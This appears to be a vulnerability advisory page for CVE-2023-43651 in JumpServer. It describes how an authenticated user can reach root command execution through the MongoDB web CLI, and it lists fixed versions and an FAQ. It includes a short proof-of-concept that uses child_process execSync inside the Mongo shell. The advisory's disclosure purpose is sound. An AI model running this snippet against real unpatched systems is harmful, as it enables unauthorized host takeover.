CWE
94
Advisory Published
Advisory Published
Updated

CVE-2023-43651: Remote code execution on the host system via MongoDB shell in jumpserver

First published: Wed Sep 27 2023(Updated: )

### Impact An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system. ### Details Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands. ``` admin> const { execSync } = require("child_process") admin> console.log(execSync("id; hostname;").toString()) uid=0(root) gid=0(root) groups=0(root) jms_koko admin> ``` ### Patches Safe versions: - v2.28.20 - v3.7.1 ### Workarounds It is recommended to upgrade the safe versions. After upgrade, you can use the same method to check whether the vulnerability is fixed. ``` admin> console.log(execSync("id; hostname;").toString()) /bin/sh: line 1: /bin/hostname: Permission denied ``` ### References Thanks for **Oskar Zeino-Mahmalat** of [Sonar](https://sonarsource.com/) found and report this vulnerability

Credit: security-advisories@github.com security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
Fit2cloud Jumpserver>=2.0.0<2.28.20
Fit2cloud Jumpserver>=3.0.0<3.7.1
go/github.com/jumpserver/koko>=3.0.0<3.7.1
3.7.1
go/github.com/jumpserver/koko>=2.0.0<2.28.20
2.28.20

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Frequently Asked Questions

  • What is CVE-2023-43651?

    CVE-2023-43651 is a vulnerability in the MongoDB sessions of JumpServer that allows an authenticated user to execute arbitrary commands and potentially gain root privileges on the system.

  • What is the severity of CVE-2023-43651?

    CVE-2023-43651 has a severity rating of 9.9 (Critical).

  • How does CVE-2023-43651 affect Fit2cloud JumpServer?

    CVE-2023-43651 affects Fit2cloud JumpServer versions from 2.0.0 to 2.28.20 and versions from 3.0.0 to 3.7.1.

  • How can an authenticated user exploit CVE-2023-43651?

    An authenticated user can exploit CVE-2023-43651 through the WEB CLI interface provided by JumpServer, allowing them to execute arbitrary commands and potentially gain root privileges.

  • Is there a fix available for CVE-2023-43651?

    Yes, it is recommended to update Fit2cloud JumpServer to a version that is not affected by CVE-2023-43651 or apply the necessary patches provided by the vendor.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203